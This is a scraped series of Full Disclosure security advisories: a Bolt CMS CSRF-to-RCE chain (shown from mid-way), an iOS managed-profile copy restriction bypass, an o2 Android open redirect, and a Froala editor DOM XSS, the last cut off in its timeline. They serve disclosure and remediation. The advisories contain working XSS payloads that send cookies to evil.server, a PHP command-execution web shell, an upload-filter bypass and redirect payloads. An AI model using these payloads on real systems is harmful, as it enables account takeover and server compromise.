verification present in the function. --[ 02.2 - Exploitation The request that is can be forged is, ----[ request ]---- POST /preview/page HTTP/1.1 Host: localhost content_edit[_token]=hTgbvurWl5fZ4m20bnb1AZCRrv8wFT0hzvjQi1TMW_wcontenttype=pages&title=title&slug=testpage1&teaser=teaser1&body=body1&id=1337 ----[ request ]---- To exploit this vulnerability an attacker has to, 1. Make an HTML page with a form that has the required parameters shown
above. The content_edit[_token] is not required. 2. Use JS to auto-submit the form. 3. Host it on a website and send the link to the victim. i.e., an
authorized user. When the victim opens the link, the browser will send the request to the
server and will follow the redirect to the preview page. This CSRF by itself does not have a huge impact. But this will be used with
the XSS, which are described below. --[ 02.3 - References [CVE-2020-4040] -
https://github.com/bolt/bolt/security/advisories/GHSA-2q66-6cc3-6xm8 --[ 03 - Cross-Site Scripting (XSS) The application is vulnerable to XSS in multiple endpoints, which could be
exploited by an attacker to execute javascript code in the context of the
victim user. --[ 03.1 - Preview generator The app uses CKEditor to get input from the users and hence any unsafe
inputs are filtered. But the request can be intercepted and manipulated to
add javascript in the content, which gets executed in the preview page.
Hence the preview generator is vulnerable to reflected XSS. --[ 03.1.1 - Exploitation ----[ request ]---- POST /preview/page HTTP/1.1 Host: localhost contenttype=pages&title=title&slug=testpage1&teaser=teaser1&body=<script>alert(1)</script>&id=151 ----[ request ]---- ----[ response ]----
.
.
.
<p class="meta"> Written by <em>Unknown</em> on Monday March 23, 2020
</p> teaser1 <script>alert(1)</script>
.
.
.
----[ response ]---- As shown above the payload in the request's body parameter is reflected in
the response. An attacker can chain the above explained CSRF with this
vulnerability to execute javascript code on the context of the victim user. --[ 03.2 - System Log The 'display name' of the users is vulnerable to stored XSS. The value is
not encoded when displayed in the system log, by the functionality that
logs the event when an authorized user enables, disables or deletes user
accounts. The unencoded 'display name' is displayed in the system log,
hence allowing the execution of javascript in the context of admin or
developer since those are the roles that are allowed to access the system
log, by default. --[ 03.2.1 - Source code analysis The vulnerability is in the
vendor/bolt/bolt/src/Controller/Backend/Users.php where the user actions
are performed and logged. There are two variables that store and are used
to display user data in this code. $user and $userEntity. It can be seen
that $userEntity is initiated with the values after being passed to
$form->isValid(). This shows that $user has the unencoded input and
$userEntity has the encoded input. In line 341, the code adds an entry to the log when a user updates their
profile. It can be seen that it uses $userEntity->getDisplayName(), hence
the displayed user input is encoded. But in line 279, there is a switch
case condition that logs the respective actions of enable, disable, delete
in the system log. ----[ code segment ]---- switch ($action) { case 'disable': if ($this->users()->setEnabled($id, false)) { $this->app['logger.system']->info("Disabled user '{$user->getDisplayname()}'.", ['event' => 'security']); $this->flashes()->info(Trans::__('general.phrase.user-disabled', ['%s'
=> $user->getDisplayname()])); } else { $this->flashes()->info(Trans::__('general.phrase.user-failed-disabled',
['%s' => $user->getDisplayname()])); } break; case 'enable': if ($this->users()->setEnabled($id, true)) { $this->app['logger.system']->info("Enabled user '{$user->getDisplayname()}'.", ['event' => 'security']); $this->flashes()->info(Trans::__('general.phrase.user-enabled', ['%s'
=> $user->getDisplayname()])); } else { $this->flashes()->info(Trans::__('general.phrase.user-failed-enable',
['%s' => $user->getDisplayname()])); } break; case 'delete': if ($this->isCsrfTokenValid() && $this->users()->deleteUser($id)) { $this->app['logger.system']->info("Deleted user '{$user->getDisplayname()}'.", ['event' => 'security']); $this->flashes()->info(Trans::__('general.phrase.user-deleted', ['%s'
=> $user->getDisplayname()])); } else { $this->flashes()->info(Trans::__('general.phrase.user-failed-delete',
['%s' => $user->getDisplayname()])); } break; default: $this->flashes()->error(Trans::__('general.phrase.no-such-action-for-user',
['%s' => $user->getDisplayname()])); } ---- [ code segment ]---- As shown above, the code uses $user->getDisplayName() instead of
$userEntity->getDisplayName(), which leads to the display of unencoded user
input. --[ 03.2.2 - Exploitation Here is how an attacker with any role can execute javascript code in the
context of the victim. 1. Log in and go to your profile settings and set your display name to
some javascript payload. For example, <script>document.write('<img
src="https://evil.server/?cookie='+document.cookie+'"/>')</script> This payload will send the admin's cookies to attacker's server 2. Now request the admin (or the victim user) to disable your account. When the admin visits the system log or the mini system log that is shown
on the right side of the Users & Permissions page, the payload gets
executed in the admin's browser. --[ 03.3 - Filename The file name is vulnerable to stored XSS. It is not possible to inject
javascript code in the file name when creating/uploading the file. But,
once created/uploaded, it can be renamed to inject the payload in it. --[ 03.3.1 - Source code analysis The function that is responsible for renaming files is renameFile(), which
is defined in
vendor/bolt/bolt/src/Controller/Async/FilesystemManager.php:335 ----[ code segment ]---- public function renameFile(Request $request) { // Verify CSRF token $this->checkToken($request); $namespace = $request->request->get('namespace'); $parent = $request->request->get('parent'); $oldName = $request->request->get('oldname'); // value assigned without any validation $newName = $request->request->get('newname'); if (!$this->isExtensionChangedAndIsChangeAllowed($oldName, $newName)) { return
$this->json(Trans::__('general.phrase.only-root-change-file-extensions'),
Response::HTTP_FORBIDDEN); } if ($this->validateFileExtension($newName) === false) { return $this->json( sprintf("File extension not allowed:
%s", $newName), Response::HTTP_BAD_REQUEST); } try { // renaming with the same unvalidated value $this->filesystem()->rename("$namespace://$parent/$oldName", "$parent/$newName"); return $this->json($newName, Response::HTTP_OK); } catch (ExceptionInterface $e) { $msg = Trans::__('Unable to rename file: %FILE%',
['%FILE%' => $oldName]); $this->logException($msg, $e); if ($e instanceof FileExistsException) { $status = Response::HTTP_CONFLICT; } elseif ($e instanceof FileNotFoundException) { $status = Response::HTTP_NOT_FOUND; } else { $status = Response::HTTP_INTERNAL_SERVER_ERROR; } return $this->json($msg, $status); } } ----[ code segment ]---- As shown above, $newName is initiated with value directly from the request,
without any validation or filtering. This allows an attacker to inject
javascript code in the name while renaming, making it vulnerable to stored
XSS. A interesting thing is, if the server is hosted on Windows it is not
possible to create files with special characters like <, >. So if this
attack is tried on Bolt CMS that is hosted on Windows it will not work. But
Linux allows special characters in file names. So, this works only if the
application is hosted on a Linux machine. --[ 03.3.2 - Exploitation 1. Create or upload a file. 2. Rename it to inject javascript code in it. For example, <script>document.write('<img
src="https://evil.server/?cookie='+document.cookie+'"/>')</script> This payload will send the victim's cookies to attacker's server 3. When the admin (or the victim user) visits the file management page, the
payload gets executed. --[ 03.3.3 - References [CVE-2020-4041] -
https://github.com/bolt/bolt/security/advisories/GHSA-68q3-7wjp-7q3j --[ 03.4 - JS file upload This stored XSS is a logical flaw in the application. By default in the
config.yml file, the application allows the following file types. ----[ code segment ]---- accept_file_types: [ twig, html, js, css, scss, gif, jpg, jpeg, png, ico, zip, tgz, txt, md, doc, docx, pdf, epub, xls, xlsx, ppt, pptx, mp3, ogg, 1wav, m4a, mp4, m4v, ogv, wmv, avi, webm, svg ] ----[ code segment ]---- It can be seen that it allows js and HTML files. --[ 03.4.1 - Exploitation An attacker with permission to upload files can exploit this to to upload
an HTML file with some javascript in it or include the uploaded js file
into the HTML. When the victim visits the uploaded file, the javascript
code gets executed in the context of the victim. --[ 03.5 - CKEditor4 Bolt CMS uses CKEditor4 in the blogs to get input. CKEditor4 by default
filters malicious HTML attributes but not the src attribute. So, it can be
exploited by using javscript URL in the src of an iframe. It is important
to not rely on CKEditor4 for XSS prevention since it is only a client side
filter, and not a server-side validator. --[ 03.5.1 - Exploitation To exploit this vulnerability, an attacker with permission to create/edit
blogs should, 1. Open the 'New Blog' page. 2. Select the 'source mode' in CKEditor4 and enter the payload <iframe src=javascript:alert(1)> 3. (optional) Switch back to WYSIWYG mode. 4. Post the blog. When the victim visits the blog, the javascript code gets executed in the
context of the victim. Now, all these XSS vulnerabilities on the surface look like simple
privilege escalation for an already authorized user, except for the preview
generator. But chaining these with the CSRF, any unauthorized attacker can
gain admin privileges, with little to no social engineering. --[ 04 - Remote Code Execution The application does not allow the upload of files with 'unsafe'
extensions, which include php and it's alternatives. But I bypassed this
protection by crafting a file name that abuses the sanitization functions.
An attacker with permissions to upload files can exploit this to upload php
files and execute code on the server. This vulnerability was chained with the above mentioned CSRF and XSS to
achieve single-click RCE. --[ 04.1 - Source code analysis The function that validates the extension is validateFileExtension() which
is defined
invendor/bolt/bolt/src/Controller/Async/FilesystemManager.php:462 ----[ code segment ]---- private function validateFileExtension($filename) { // no UNIX-hidden files if ($filename[0] === '.') { return false; } // only whitelisted extensions $extension = pathinfo($filename, PATHINFO_EXTENSION); $allowedExtensions = $this->getAllowedUploadExtensions(); return $extension === '' || in_array(mb_strtolower($extension), $allowedExtensions); } ----[ code segment ]---- As shown in the above code segment, the return value returns a value if the
extension is '' or if it is an allowed extension. The function allows
files with no extension. So, I tried to upload a file with the name 'backdoor.php.' The dot at the end makes the pathinfo() function return
null. So the file gets accepted. But when you open the file in the browser,
it does not execute it as php, but just as a plain text file. The next step is to get the last dot removed. Analyzing the rename() function defined in
vendor/bolt/filesystem/src/Filesystem.php:300, the function calls another
function normalizePath($newPath) with the new path as a parameter. ----[ code segment ]---- public function rename($path, $newPath) { $path = $this->normalizePath($path); $newPath = $this->normalizePath($newPath); $this->assertPresent($path); $this->assertAbsent($newPath); $this->doRename($path, $newPath); } ----[ code segment ]---- The normalizePath() function is defined in the same file in line 823, acts
as a wrapper to Flysystem's normalizePath() function. It is being used to
fetch the 'real' path of files. This is used to validate the file location
etc. For example, ./somedir/../text.txt == ./text.txt == text.txt So when './text.txt' is passed to this function, it returns 'text.txt' So, to remove the last dot from our file name 'backdoor.php.', I changed it
to 'backdoor.php/.' Passing it to normalizePath() it returns 'backdoor.php',
which is exactly what is needed. So the data flow looks like, first the value 'backdoor.php/.' is passed to
validateFileExtension() which returns NULL because there is no text after
that last dot. So, the extesion filter is bypassed. Next, the same value is
passed to normalizePath() which removes the last '/.' because it looks like
it's a path to the current directory. At the end, the file gets renamed to 'backdoor.php' Pwned! --[ 04.2 - Exploitation To exploit this vulnerability, an attacker with permission to upload files
should, 1. Create a php file with code that gives a backdoor. For example, <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd =
($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> 2. Rename the file with a dot at the end. For example, 'backdoor.php.' 3. Upload the file and rename it to 'backdoor.php/.' You will notice that it will get renamed to 'backdoor.php' --[ 04.3 - References
https://stazot.com/boltcms-file-upload-bypass --[ 05 - Solution 1. Validate the CSRF token before generating preview in preview() function
- vendor/bolt/bolt/src/Controller/Frontend.php:200 2. Validate the user inputs to the preview generation endpoint before
displaying them in preview() function -
vendor/bolt/bolt/src/Controller/Frontend.php:200 3. Use the variable that has the encoded value to display user information.
i.e., use $userEntity instead of $user in -
vendor/bolt/bolt/src/Controller/Backend/Users.php:279 4. Validate the user inputs before renaming the files in renameFile()
function in - /src/Controller/Async/FilesystemManager.php:335 5. Do not allow the upload of JS and HTML files. If that is absolutely
required, then add it as a separate permission that the admin can allocate
to certain roles and not everyone who has access to file upload. 6. Enable CKEditor4's option to disallow javascript URLs. For more
information, checkhttps://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_config.html#cfg-linkJavaScriptLinksAllowed 7. Change the flow of data while renaming. First pass the data through
normalizePath() data and then through validateFileExtension(). That way,
the validation function validates the final value. --[ 06 - Contact Name : Sivanesh Ashok Twitter: @sivaneshashok Website: https://stazot.com _______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/ 







  By Date  
     
  By Thread  

Current thread:

  • Bolt CMS <= 3.7.0 Multiple Vulnerabilities – CSRF to RCE Sivanesh Ashok (Jul 03)




Follow me for more information.


fulldisclosure logo
Full Disclosure
mailing list archives






[SYSS-2020-011] Apple iOS – Exposure of Resource to Wrong Sphere (CWE-668)



From: Philipp Buchegger <philipp.buchegger () syss de>
Date: Thu, 2 Jul 2020 14:33:51 +0200



Advisory ID: SYSS-2020-011
Product: Apple iOS
Manufacturer: Apple Inc.
Affected Version(s): 13.3.1, 13.5.1
Tested Version(s): 13.3.1, 13.5.1
Vulnerability Type: Exposure of Resource to Wrong Sphere (CWE-668)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2020-03-23
Solution Date: -
Public Disclosure: 2020-07-02
CVE Reference: Not yet assigned
Author of Advisory: Philipp Buchegger, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: iOS (formerly iPhone OS) is a mobile operating system created and
developed by Apple Inc. exclusively for its hardware. It is the
operating system that presently powers many of the company's mobile
devices, including the iPhone. On a company device with DEP (Device Enrollment Program), it is possible
to enforce certain restrictions in order to separate company from
private data. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: It is possible to circumvent the copy & paste restriction from the
company profile to the private profile. Thus, it is possible to extract
attachments that can be previewed ("Quick Look") in the native Mail
client to any private app. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The vulnerability can be demonstrated and reproduced in the following
way: 1. Receive a PDF document in the native Mail app via a managed Exchange profile 2. On a managed and restricted device, copying this document is not possible 3. Tap and hold the PDF document, select "Quick Look"/"Übersicht" 4. Open the "Share..." dialog 5. Copy the document - this was not permitted in the previous view 6. Paste it in any private app, for example in "Files"; for further demonstration, the Adobe Acrobat app was used 7. Access the file locally with any installed app 8. Download the digital document (no screen dump, a perfect digital copy of the original document) as PDF via USB ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: SySS GmbH is not aware of a solution for this reported security
vulnerability. Apple does not consider the described security issue to be a security
vulnerability and has not fixed it yet. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2020-03-22: Vulnerability discovered
2020-03-23: Vulnerability reported to manufacturer
2020-03-30: E-mail to manufacturer concerning status update
2020-04-14: E-mail from manufacturer concerning status update
2020-04-15: E-mail to manufacturer concerning status update
2020-04-17: E-mail from manufacturer concerning status update
2020-05-01: Product security of manufacturer responds that the reported issue is not a security vulnerability, but it has been passed along to the appropriate team
2020-05-08: E-Mail to manufacturer regarding status update from the informed team and publication of the security issue
2020-05-12: E-mail to manufacturer concerning status update
2020-05-13: E-mail from manufacturer regarding publication
2020-05-14: Provided proof of concept video to manufacturer
2020-06-18: E-mail from manufacturer concerning status update
2020-07-02: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Apple iOS https://www.apple.com/de/ios/ios-13/
[2] SySS Security Advisory SYSS-2020-011 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-011.txt
[3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/
[4] SySS Proof of Concept Video https://www.youtube.com/watch?v=82jbJzdxPFY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Philipp Buchegger of SySS GmbH. E-Mail: philipp.buchegger () syss de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Philipp_Buchegger.asc
Key ID: 0x065809F0BB6747E8
Key Fingerprint: 489F 34EE FA88 27DE 69A0 756B 0658 09F0 BB67 47E8 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en 

Attachment:
signature.asc

Description: OpenPGP digital signature

 _______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/







  By Date  
     
  By Thread  

Current thread:

  • [SYSS-2020-011] Apple iOS – Exposure of Resource to Wrong Sphere (CWE-668) Philipp Buchegger (Jul 03)




Follow me for more information.


fulldisclosure logo
Full Disclosure
mailing list archives



  By Date  
     
  By Thread  
     



[CVE-2020-11882] o2 Business for Android “canvasm.myo2.SplashActivity” <= 1.2.0 Open Redirect



From: “Julien Ahrens (RCE Security)” <info () rcesecurity com>
Date: Wed, 1 Jul 2020 05:45:34 +0000



RCE Security Advisory
https://www.rcesecurity.com 1. ADVISORY INFORMATION
=======================
Product: o2 Business for Android
Vendor URL: https://play.google.com/store/apps/details?id=telefonica.de.o2business
Type: Open Redirect [CWE-601]
Date found: 2020-04-16
Date published: 2020-07-01
CVSSv3 Score: 3.3 (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
CVE: CVE-2020-11882 2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security. 3. VERSIONS AFFECTED
====================
o2 Business App for Android 1.2.0 4. INTRODUCTION
===============
Kommunikation ist Ihr tägliches Sprungbrett in die Geschäftswelt. Und mit der
neuen O2 Business App haben Sie alle wichtigen Details stets vor Augen.
Verfolgen Sie investierte Gesprächszeiten zurück und sehen Sie verfügbare
Kommunikations-Kapazitäten vorher. Vom aktuellen Stand des Inklusiv-Volumens,
über Einzelverbindungen und Tarifdetails, bis zur lokalen Netz-Qualität behalten
Sie mit der O2 Business App immer und überall den Durchblick. Erfahren Sie jetzt
mehr über Ihren informativen Begleiter! (from the vendor's homepage) 5. VULNERABILITY DETAILS
========================
The "O2 Business App" for Android exposes an activity to other apps called "canvasm.myo2.SplashActivity". The purpose of this activity is to handle
deeplinks which can be delivered to the app either via links or by directly
calling the activity. However, the app does not properly validate the format of deeplinks by just
using str.contains() to verify the allowed host: private boolean isVanityLink(String str) { return str.contains("https://o2.de&";) || str.contains("https://blau.de&";) || str.contains("https://e2e2.o2.de&";) || str.contains("https://e2e2.blau.de&";); } private boolean isDeepLink(String str) { return str.contains("https://www.o2online.de&";) || str.contains("https://www.blau.de&";) || str.contains("https://e2e2.o2online.de&";) || str.contains("https://e2e2.blau.de&";) || str.contains(BuildConfig.PIRANHA_BASE_E2E2_URL) || str.contains("https://login.o2online.de&";) || str.contains("https://login-e2e2.blau.de&";) || str.contains("https://login.blau.de&";);
} This can be abused by an attacker (malicious app) to redirect a user to any page
and deliver any content to the user. An exemplary exploit could look like the
following: Intent i = new Intent();
i.setComponent(new ComponentName("telefonica.de.o2business", "canvasm.myo2.SplashActivity"));
Uri uri = Uri.parse("https://www.rcesecurity.com?dummy=https://o2.de&";);
i.setData(uri);
startActivity(i); 6. RISK
=======
A malicious app on the same device is able to exploit this vulnerability to lead
the user to any webpage/content. The specific problem here is the assumed trust
boundary between the user having the o2 Business app installed and what the app
is actually doing/displaying to the user. So if the user sees the app being
loaded and automatically redirecting to another page, it can be assumed that the
loaded page is also trusted by the user. 7. SOLUTION
===========
Update the app to version 1.3.0 8. REPORT TIMELINE
==================
2020-04-16: Discovery of the vulnerability
2020-04-16: Although Telefonica runs a VDP on Bugcrowd
(https://bugcrowd.com/telefonicavdp), I did not want to accept their non-
disclosure terms, which is why I have tried to contact them directly via their
official CERT contact.
2020-04-16: Telefonica responds and asks for full vulnerability details
2020-04-16: Send over the full advisory including a full PoC exploit.
2020-04-16: Telefonica acknowledges the issue
2020-04-16: CVE requested from MITRE
2020-04-17: MITRE assigns CVE-2020-11882
2020-06-03: No further communication from Telefonica. Mailed them again about
the status of the fix.
2020-06-03: Telefonica is still working on this issue and the fix is scheduled
to be included in the next release.
2020-06-04: Version 1.3.0 is released
2020-07-01: Public disclosure. 9. REFERENCES
=============
- _______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/ 







  By Date  
     
  By Thread  

Current thread:

  • [CVE-2020-11882] o2 Business for Android “canvasm.myo2.SplashActivity” <= 1.2.0 Open Redirect Julien Ahrens (RCE Security) (Jul 03)




Follow me for more information.


fulldisclosure logo
Full Disclosure
mailing list archives






CVE-2019-19935 – DOM XSS in Froala WYSIWYG HTML Editor



From: Advisories <advisories () compass-security com>
Date: Thu, 2 Jul 2020 12:06:57 +0000



#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: Froala WYSIWYG HTML Editor
# Vendor: Froala
# CSNC ID: CSNC-2020-004
# CVE ID: CVE-2019-19935
# Subject: DOM XSS in Froala WYSIWYG HTML Editor
# Severity: Medium
# Effect: Remotely exploitable
# Author: Emanuel Duss <emanuel.duss () compass-security com>
# Date: 2020-07-01
#
############################################################# Introduction
------------ Froala WYSIWYG HTML Editor is a lightweight WYSIWYG HTML Editor written in
JavaScript that enables rich text editing capabilities for web applications
[1]. Froala sanitizes the user input in order to prevent cross-site scripting
attacks [2]. During a web application penetration test, Compass found a DOM-based cross-site
scripting (XSS) [3] in the Froala WYSIWYG HTML Editor. HTML code in the editor
is not correctly sanitized when inserted into the DOM. This allows an attacker
that can control the editor content to execute arbitrary JavaScript in the
context of the victim's session. Affected
-------- * All versions of the Froala WYSIWYG HTML Editor The issue was found in December 2019 in version 3.0.6 and was still not fixed
in July 2020 in version 3.1.1. Technical Summary
----------------- It's possible to perform DOM based XSS in the Froala editor by inserting the
`<iframe>` tag and the `srcdoc` attribute into the editor: <iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe> This can be verified by inserting the payload into the "Code View" of the
editor. In this case, this is would be a self-XSS because the users would only attack
themselves. However, it could be possible that untrusted data from a
non-controlled source is loaded into the editor in order to exploit it. An
example could be a web application where multiple users can edit the same
content using this editor. An attacker can use this to execute own JavaScript code in the session of the
victim. This can be abused to read the content of the victim's account, use the
session to make further requests to the web application or read the cookies or
web storage. Technical Details
----------------- # Correct Behavior According to the Froala tech support page "Why is the <script> tag being
removed?", the `<script>` tag is removed in order to prevent possible XSS
attacks [2]. Other XSS payloads that use other HTML tags and event handlers are
also removed from the DOM before they are inserted. This can be verified using a PoC hosted on `poc.example.net` that inserts
potentially untrusted data with a `<script>` tag into the editor: <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_style.min.css&"; rel="stylesheet" type="text/css" /> <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_editor.pkgd.min.css&"; rel="stylesheet" type="text/css" /> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/js/froala_editor.pkgd.min.js&";></script> <div id="froala-editor"></div> <script> let editor = new FroalaEditor('div#froala-editor', {}, function() { // This data could be loaded from a potentially untrusted source, e.g. from an API via an XMLHttpRequest data = "<s>Hello<\/s><script>console.log(document.domain)<\/script><u>Compass<\/u>"; // Inserting untrusted data into the editor editor.html.set(data); // Show how the untrusted data is embedded into the DOM console.log(editor.html.get()); }) </script> The JavaScript console shows that legit HTML tags like `<s>` or `<u>` were
inserted into the DOM but the `<script>` tag was correctly removed (as
expected) and therefore the JavaScript was not executed: <p><s>Hello</s><u>Compass</u></p> The same can be done by inserting an `<img>` tag with an `onerror` event
handler as an XSS vector: [...] data = "<s>Hello<\/s><img src=x onerror=console.log(document.domain)><u>Compass<\/u>"; [...] The JavaScript console again shows that the legit HTML tags were inserted and
also the `<img>` tag, but without the used `onerror` event handler. Therefore,
the JavaScript was not executed: <p><s>Hello</s><img src="x" class="fr-fic fr-dii"><u>Compass</u></p> This shows that it's not possible to load and execute common XSS payloads into
the editor. # XSS Bypass I tried every event handler from the awesome PortSwigger XSS cheat sheet [4],
but all of them were blocked. Thanks to the XSS cheat sheet, I found an HTML
tag with an attribute that does not start with `on`, which can execute
JavaScript in the origin of the website. This tag was not filtered. It's the
`<iframe>` tag with the `srcdoc` attribute. The `srcdoc` attribute specifies
the HTML content of the page to show in the inline frame [5]. This can be used
to embed JavaScript code. The code runs in the origin of the website where the
iframe is embedded. Working XSS payload: [...] data = "<s>Hello<\/s><iframe srcdoc=\"<img src=x onerror=console.log(document.domain)>\"><\/iframe><u>Compass<\/u>"; [...] The JavaScript console shows that the `<iframe>` tag with the `srcdoc`
attribute was inserted into the DOM without sanitizing. Also the content of
the iframe with the `<img>` tag and the `onerror` event handler was not
sanitized. Further, the origin on which PoC website is hosted is printed: <p><s>Hello</s><iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe><u>Compass</u></p> poc.example.net Therefore, this shows that the following XSS payload can be used in order to
inject and execute JavaScript into the DOM, which results in a DOM-based XSS: <iframe srcdoc="<img src=x onerror=console.log(document.domain)>"></iframe> Note: The `<img>` tag with the `onerror` event handler is only the data content
of the `srcdoc` attribute and no code for the browser. This is rendered into
code later when the content of the iframe is built. The injected JavaScript code runs in the origin of the website where the Froala
editor is running. The next section explains why I mention this explicitly. XSS with Undefined / Empty Origin
--------------------------------- There are several issues marked as open and fixed in the Froala GitHub
repository regarding XSS [6]. The closed ones are also not fixed at the moment.
However, most of these XSS are running in another origin as the website where
the editor is loaded. # Example 1 For example, the issue #3270 [7] that is marked as closed and uses an embedded
object (`<embed>` tag) in order to execute JavaScript: [...] data = "<EMBED/SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29uc29sZS5sb2coZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pjwvc3ZnPgo=\">" [....] The base64 decoded payload is an SVG image containing JavaScript: <svg xmlns:svg="http://www.w3.org/2000/svg&"; xmlns="http://www.w3.org/2000/svg&"; xmlns:xlink="http://www.w3.org/1999/xlink&"; version="1.0" x="0" y="0" width="194" height="200" id="xss"> <script type="text/ecmascript">console.log(document.domain)</script></svg> The JavaScript console shows that the code is executed but the origin is
`undefined`: <p></p> undefined # Example 2 Another example is the issue #3039 [8] that is marked as closed uses the `<object>`
tag to embed HTML / JavaScript code: [...] data = "<object data='data:text/html,<svg onload=console.log(document.domain)>'>"; [...] The JavaScript console shows that the code is executed but the origin is empty: <p><object data="data:text/html,<svg onload=console.log(document.domain)>"></object></p> // empty line # Exploiting XSS with Undefined / Empty Origins Because the origin is not the same as where the PoC is hosted, it's not a
typical XSS where an attacker could read the content of the victim's website,
use the session to make further requests or access the cookies or web storage. It is however still possible to perform arbitrary redirects to other websites
using the reference to the `window.top.location`: [...] data = "<object data='data:text/html,<svg onload=window.top.location=\"http://evil.example.net/\&";>'>"; [...] This redirects to http://evil.example.net/. The same applies for the embed tag: [...] data = "<EMBED/SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj4KICA8c2NyaXB0PndpbmRvdy50b3AubG9jYXRpb249Imh0dHA6Ly9ldmlsLmV4YW1wbGUubmV0LyI8L3NjcmlwdD4KPC9zdmc+Cg==\">" [...] Decoded base64 payload: <svg xmlns:svg="http://www.w3.org/2000/svg&"; xmlns="http://www.w3.org/2000/svg&"; xmlns:xlink="http://www.w3.org/1999/xlink&"; version="1.0" x="0" y="0" width="194" height="200" id="xss"> <script>window.top.location="http://evil.example.net/&";</script> </svg> This also redirects to http://evil.example.net/. This is not as nice and powerful as the "real" XSS attack from the beginning, but still
something ;-). Vulnerability Classification
---------------------------- CVSS v3.1 Metrics [9]: * CVSS Base Score: 6.1
* CVSS Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation
----------- This XSS issue is not fixed. The vendor can't tell any exact release date for a
fixed version. Therefore, only trusted data or data that is already sanitized should be loaded
into the editor. Timeline
-------- 2019-12-05 Discovered vulnerability and informed customer.
2019-12-06 Contacted Froala and asked for security contact. Auto reply received, ticket #15328 opened.
2019-12-09 Asked again, got response. Contact via e-mail (support () froala com) and ticket number.
2019-12-10 Sent vulnerability details.
2019-12-16 Froala confirmed vulnerability and that all Froala HTML editor versions are affected.
2019-12-19 Informed Froala about the closed XSS GitHub issues that are still not fixed.
2019-12-23 MITRE assigned CVE number CVE-2019-19935.
2019-12-26 Froala tells that this issue has high priority. Issue will be fixed after version 3.1.0.
2020-01-09 Asked Froala for updates on the issue.
2020-01-10 Froala tells that all reported issues will be fixed after version 3.1.1.
2020-02-21 Asked Froala for updates on the issue. No response.
2020-03-09 Asked Froala for updates on the issue.
2020-03-20 Froala tells that issue will be fixed in the next release.
